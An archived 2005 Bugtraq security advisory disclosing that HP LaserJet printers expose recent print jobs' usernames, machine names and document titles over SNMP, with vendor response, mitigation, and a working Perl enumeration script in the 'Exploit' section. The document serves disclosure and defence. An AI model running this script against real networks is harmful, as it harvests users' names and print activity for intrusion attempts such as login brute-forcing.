PTL Advisory 050825 - HP LaserJet Network Username and Information Enumeration

From: Pinion Lab (lab_at_pinion.se)
Date: 09/15/05

  • Next message: Martin Pitt: "Re: AWstats Path Disclosure Vulnerability"
    Date: Thu, 15 Sep 2005 14:52:18 +0200
    To: bugtraq@securityfocus.com
    
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    - --
    Pinion Security Consulting AB
    Tegeluddsvägen 92
    115 28 Stockholm
    Tel. +46 8 54591350
    Fax. +46 8 54591369

    PGP: B57F 2C79 1D8C 0F84 00D5 4076 7FF5 7413 697A 2DD0

    - --

    This e-mail is confidential to the named recipient and any
    unauthorised use or dissemination is prohibited. If you are
    not the intended recipient please delete the message and
    notify Pinion.

    Internet email is not a wholly secure medium; please recognize
    this when emailing us on confidential matters. We have taken
    steps to ensure this email is virus-free, however you are
    advised to make appropriate checks.
    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.2.2 (MingW32)

    iD8DBQFDKW6Cf/V0E2l6LdARAui7AKCV/9hS8W2HgXWDTQSZkthfpZUrrQCfXWzd
    jz7lL2VWynEmDesEr0bkkwI=
    =NBXc
    -----END PGP SIGNATURE-----

    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    =================================================================

                               P . T . L .

        P I N I O N S T E K N I S K A L A B O R A T O R I U M

                    (The Pinion Technical Laboratory)

                          http://www.pinion.se

                                Advisory

    =================================================================

    Vulnerability Name
    - - ------------------
    HP LaserJet Network Username and Information Enumeration

    Pinion ID
    - - ---------
    PTL_advisory_050825

    Author
    - - ------
    George Hedfors

    Class
    - - -----
    Configuration Error

    Remote
    - - ------
    Yes

    Local
    - - -----
    N/A

    Discovered
    - - ----------
    August 25 2005

    Published
    - - ---------
    September 15 2005

    Updated
    - - -------
    N/A

    Credit
    - - ------
    This vulnerability was found by George Hedfors.

    Vulnerable
    - - ----------
    HP LaserJet 2430

    Possibly other HP printers that operate using the Jetdirect
    controls.

    Discussion
    - - ----------
    HP LaserJet printers has an extensive administrative user interface
    provided over SNMP. SNMP is normally used for monitoring applications
    and servers performance but can also be used to perform remote
    configurations.

    Pinion has discovered that HP LaserJet printers store information
    regarding recently printed documents. Information such as document
    name, title, number of pages, document size, user who has printed the
    document and the machine name where the print job was initiated.

    This document information "cache" is flushed when the document is
    older then one hour but in mean time, the information can be obtained
    by anyone with access to the network and who has information
    regarding the "public" SNMP community configured at the printer.

    In reality, an intruder could use this information to obtain possible
    usernames that later could be used in a login brute force attack
    against servers.

    Hewlet Packard was informed about this issue on September 7, 2005.

    Vendor response: "This information is kept by the printer in the
    printer specific MIB. Jetdirect controls the authentication and
    subsequent authorization to all the MIBs. This authentication/
    authorization can be controlled via SNMP settings."

    HP tracking number: SSRT051032

    Solution
    - - --------
    There is no direct way to prevent the printer from exposing
    information about recently printed documents except for disabling
    SNMP.

    Access to administrative features of the LaserJet, including SNMP,
    can be controlled and limited in various ways depending on the
    security requirements of the customer's environment. For more
    information please refer to "HP Jetdirect Embedded Print Server
    Administrator's Guide", chapter 7 - Security Features.

    References
    - - ----------
    "HP Jetdirect Embedded Print Server Administrator's Guide"

    http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?
    locale=en_US&contentType=SupportManual&docIndexId=3124&
    prodTypeId=18972&prodSeriesId=416419&lang=en&cc=us

    Additional information regarding HP Jetdirect security is available
    here:

    http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?
    objectID=bpj05999

    http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?
    objectID=c00004828

    Exploit
    - - -------
    The tool attached provides a possibility to extract the described
    information.

    #!/usr/bin/perl
    #####################################################################
    ##
    ## HP LaserJet SNMP User name enumeration tool v0.2 by
    ## Pinion Labs 050705
    ## george[46]hedfors[64]pinion[46]se
    ## http://www.pinion.se
    ##
    ## Description
    ## HP LaserJet printers loggs recent printed documents with
    ## timestamp, size, number of pages, username and machine name.
    ## These can be extracted using a specially crafted SNMP Object ID.
    ##
    ## Document name under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1
    ## Document pages under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12
    ## Document size under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14
    ## Usernames are found under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1
    ## Machine names under 1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2
    ##
    ## Output format
    ## DocID:Username:Machine:Pages:Size:DocName
    ##
    ##

    use Net::SNMP;

    ## Number of errors in row that is tolerated before exit
    $tolerance = 10;
    ## Default SNMP community to use
    $defcommunity = "public";
    ## Default SNMP port to use
    $defport = 161;

    ### END OF CONFIG ###

    $host = $ARGV[0] || die "syntax: $0 victim.com \[community\] ".
                                 "\[startid\]\n";
    $community = $ARGV[1] || $defcommunity;
    $startid = $ARGV[2] || 0;

    ($session, $error) = Net::SNMP->session(-hostname => $host,
                                            -community => $community,
                                            -port => $defport);

    if (!defined($session)) {
            printf("ERROR: %s.\n", $error);
            exit 1;
    }

    for($i = $startid; $err < $tolerance; $i++) {
            $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1.$i.0";
            $result = $session->get_request(-varbindlist => [$oid]);

            if (!defined($result)) {
                    if($found > 0) {
                            $err++;
                    }
            } else {
                    $found++;

                    ($null, $user) = split(/\=/, $result->{$oid}, 2);

                    $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2.$i.0";
                    $result = $session->get_request(-varbindlist => [$oid]);
                    ($null, $id) = split(/\=/, $result->{$oid}, 2);

                    $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1.$i.0";
                    $result = $session->get_request(-varbindlist => [$oid]);
                    $doc = hex2ascii($result->{$oid});

                    $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.12.$i.0";
                    $result = $session->get_request(-varbindlist => [$oid]);
                    $pages = $result->{$oid};

                    $oid = "1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.14.$i.0";
                    $result = $session->get_request(-varbindlist => [$oid]);
                    $size = $result->{$oid};

                    printf("%d:%s:%s:%s:%s:%s\n", $i, $user, $id, $pages, $size, $doc);

                    $err = 0;
            }
    }

    $session->close;

    exit 0;

    sub hex2ascii() {
            my $hex = shift;
            my $asc;

             for($n = 6; $n < length($hex); $n += 2) {
                    $asc .= chr(hex(substr($hex, $n, 2)));
            }

            return $asc;
    }

    -----BEGIN PGP SIGNATURE-----
    Version: PGP 8.1

    iQA/AwUBQykij3/1dBNpei3QEQKgnQCfULMT+VkrGLe9dJLx/3oAB8gP/B4An0Xe
    of2e6qiAGjUV6noguEpAloBm
    =h5Fv
    -----END PGP SIGNATURE-----


  • Next message: Martin Pitt: "Re: AWstats Path Disclosure Vulnerability"

    Relevant Pages

    • [EXPL] HP LaserJet Network Username and Information Enumeration
      ... Get your security news from a reliable source. ... HP LaserJet printers has an extensive administrative user interface ... provided over SNMP. ... HP LaserJet stores network information from document print requests, ...
      (Securiteam)
    • Re: Laser Printer recommendations : Appleworks 5.1 PLUS Appletalk/Postscript
      ... Given your current requirements (AppleWorks 5.1 / AppleTalk-LocalTalk ... LaserJet 4050xx series, but any of the current 4xxx models should be just ... printers support PCL 'macros', which allow you to store items such as forms ... is booted into that and you try to use AppleTalk.] ...
      (comp.sys.apple2)
    • Re: Good All In One for a teacher
      ... I do not know how old the printers you have tested are, but since about the DeskJet 850 the HP DeskJet's draft mode has been pretty good for plain paper text, and for most cases there is little difference in print quality between normal and best mode for text. ... I stand by my original assertion that draft is pretty acceptable for most users for normal printing on any recent HP inkjet printer. ... EconoMode on some HP's LaserJet printers to be unusable. ... In the development of the ISO standard there were those that wanted to make the testing based on continuous printing and those that favored a user rate test, ...
      (comp.periphs.printers)
    • Re: Good All In One for a teacher
      ... I do not know how old the printers you have tested are, but since about the DeskJet 850 the HP DeskJet's draft mode has been pretty good for plain paper text, and for most cases there is little difference in print quality between normal and best mode for text. ... I stand by my original assertion that draft is pretty acceptable for most users for normal printing on any recent HP inkjet printer. ... EconoMode on some HP's LaserJet printers to be unusable. ... In the development of the ISO standard there were those that wanted to make the testing based on continuous printing and those that favored a user rate test, ...
      (comp.periphs.printers)
    • Re: Anonymous Printer Share - Access Denied
      ... "additional restrictions for anonymous connections" in Local Security Policy ... > the shared printers on the domain controller, ... > domain controller from the network. ...
      (microsoft.public.win2000.security)